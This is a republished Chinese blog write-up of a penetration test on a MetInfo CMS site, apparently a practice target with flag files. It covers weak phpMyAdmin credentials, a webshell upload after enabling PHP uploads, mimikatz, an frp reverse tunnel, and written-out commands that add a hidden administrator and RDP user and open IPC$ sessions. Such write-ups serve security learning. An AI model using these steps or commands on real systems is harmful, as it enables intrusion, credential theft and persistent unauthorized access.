实战 | 某CMS5.0版本渗透测试
2023-4-20 00:1:42 Author: 橘猫学安全(查看原文) 阅读量:20 收藏

打点

信息收集阶段

信息收集一波:查看robots.txt,网站CMS识别,whois查询。

反查一波注册机构。

看下备案信息。

可以看到网站为个人注册。

网站goby跑一下,看看能不能直接扫描出漏洞。

然而并没有用,但是可以获取真实IP:和开放端口。

扫一波目录,看看有没有利用点。

发现可以直接远程连数据库。

漏洞利用阶段

搞起,除此途径之外还可以,查找可利用漏洞,此页面可以进行文件上传,尝试上传图片马。

将select改为input。

如图所示,上传成功。

该地点貌似没有对上传文件类型做过滤,也可以直接上传PHP文件,由于上传路径不明,菜刀无法连接。。。。。暂弃

排查sql注入点

进行sql注入,注入点:http://test.xxxxxx.xyz/about/show.php?lang=en&id=42

直接sqlmap跑数据库,发现如下数据库。

Sqlmap跑表名耗时太长,暂弃。

还是继续从之前的phpmyadmin着手,直接用远程登录数据库,看表,登录凭证是弱密码root/root。

从表中提取信息,Mysql库里有user表,直接解码,登录。

不存在,应该是找错了,从其他库里找找。

解密,登录osptech/123456。

登陆成功。

通过之前扫描目录出来的后台地址进行登录,后台登录 - MetInfo企业网站管理系统 (xxxxxx.xyz)

http://test.xxxxxxx.xyz/back/login/login.php。

浏览相关功能模块,发现上传模块,上传一句话木马,发现可以修改上传类型。

直接添加允许PHP文件上传。

传马。

菜刀连接查看。

可以看到连接成功,然后把刚才修改的文件上传类型改回原样,毕竟明目张胆也是不太好的。

上传大马:xxx.php。

连接大马。

C盘下有flag信息。

查看信息。

用菜刀上传一个cmd.exe。

上传mimikate.exe。

已经存在,直接用。

查看一下开放端口。

发现3389开放,提权进行远程连接。

利于大马创建用户,加入管理员权限。

尝试远程连接。

连接失败,尝试其他方式。

用大马生成文件:systeminfo > C:\q.txt。

将q.txt下载到主机,用wesng.py筛选漏洞,选择漏洞利用。

打开生成的文件。

权限已经提升到最大,不需要msf提权,暂弃。

尝试另一台Linux主机。

连接。

查看flag。

至此也没有什么可以利用的点,暂弃。

边界突破

frp反向代理

尝试frp内网穿透。

服务器端:阿里云服务器

蚁剑上传frp

配置frpc.ini。

云服务器开启./frps -c ./fprs.ini。

客户端开启。

映射成功之后远程连接,远程连接之前先创建用户加入管理员组和远程连接组。

net user Q @Qihang123 /add  创建用户

net localgroup "Remote Desktop Users" Q /add  将创建的用户添加到远程连接组

net localgroup Administrators Q /add 将创建的用户添加到管理员组

然后即可通过远程登录进入。

进行远程连接。

远程连接成功。

内网渗透

信息收集

利用之前上传的mimikate搜集内网信息。

拿到管理员账户与密码。

使用nbtscan探测内网存活主机ip。

进行内网信息收集

Systeminfo

net  start。

tasklist。

Ipconfig /all。

net   view   /domain。

net   time   /domain。

netstat  -an。

whoami   /all。

net  config  workstation。

net  user。

net  user    /domain。

net  localgroup。

wmic  useraccount  get  /all。

进行IPC$连接

net use \\193.168.131.135\ipc$ /user:Administrator "123456"

net use \\193.168.131.132\ipc$ /user:Administrator "123456"

连接失败,重新寻找凭据,暂弃。

一时也不知道该如何下手了,暂时就到此为止吧,以后有机会在进行内网渗透吧。

作者:hongxiuqingzan 原文地址:https://www.freebuf.com/articles/web/346028.html

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247507795&idx=1&sn=5261a4f5155b103810ae95369fd262d0&chksm=c04d586df73ad17bf6c83212a4863de3250474ef4685cd169dab4145a50b8a219afdef67c664#rd
如有侵权请联系:admin#unsafe.sh